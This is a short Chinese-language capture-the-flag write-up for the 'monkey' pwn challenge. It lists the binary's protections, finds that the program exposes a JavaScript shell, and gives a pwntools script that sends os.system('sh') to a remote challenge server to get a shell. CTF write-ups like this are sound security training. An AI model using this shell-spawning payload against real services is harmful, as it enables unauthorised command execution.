攻防世界pwn进阶区monkey
首先查保护–>看链接类型–>赋予程序可执行权限–>试运行
32位,小端序
未开启RELRO---got表可写
未开启canary保护---存在栈溢出
开启NX保护----注入的shellcode不可执行
未开启PIE----程序地址为真实地址
动态链接
运行后出现一个js>很奇怪
ida后找不到主函数
怀疑不是c语言程序
上查一下js,意思是JavaScript
看了别人的wp,发现这个程序直接是js的交互式命令行模式
os.system('sh')
这是js的系统调用shell的命令
exp
from pwn import *
sh = remote('111.200.241.244',55683)
sh.sendlineafter('js>',"os.system('sh')")
sh.interactive()
或者不用exp
直接连接到远程,输入os.system(‘sh’)